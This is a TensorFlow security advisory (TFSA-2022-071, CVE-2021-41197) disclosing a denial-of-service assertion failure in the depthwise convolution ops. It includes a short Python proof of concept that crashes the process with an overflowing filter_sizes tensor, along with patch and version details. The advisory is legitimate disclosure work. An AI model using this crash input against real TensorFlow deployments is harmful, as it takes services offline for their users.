## TFSA-2022-071: `CHECK` failure in depthwise ops via overflows

### CVE Number
CVE-2021-41197

### Impact
The implementation of depthwise ops in TensorFlow is vulnerable to a denial of service via `CHECK`-failure (assertion failure) caused by overflowing the number of elements in a tensor:

```python
import tensorflow as tf

input = tf.constant(1, shape=[1, 4, 4, 3], dtype=tf.float32)
filter_sizes = tf.constant(1879048192, shape=[13], dtype=tf.int32)
out_backprop = tf.constant(1, shape=[1, 4, 4, 3], dtype=tf.float32)
tf.raw_ops.DepthwiseConv2dNativeBackpropFilter(
    input=input, filter_sizes=filter_sizes, out_backprop=out_backprop, strides=[1, 1, 1, 1], padding="SAME")
```

This is another instance of [TFSA-2021-198](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-198.md) (CVE-2021-41197).

### Patches
We have patched the issue in GitHub commit [3796cc4fcd93ae55812a457abc96dcd55fbb854b](https://github.com/tensorflow/tensorflow/commit/3796cc4fcd93ae55812a457abc96dcd55fbb854b).

The fix will be included in TensorFlow 2.9.0. We will also cherrypick this commit on TensorFlow 2.8.1, TensorFlow 2.7.2, and TensorFlow 2.6.4, as these are also affected and still in supported range.

### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.

### Attribution
This vulnerability has been reported by Neophytos Christou from Secure Systems Lab at Brown University.
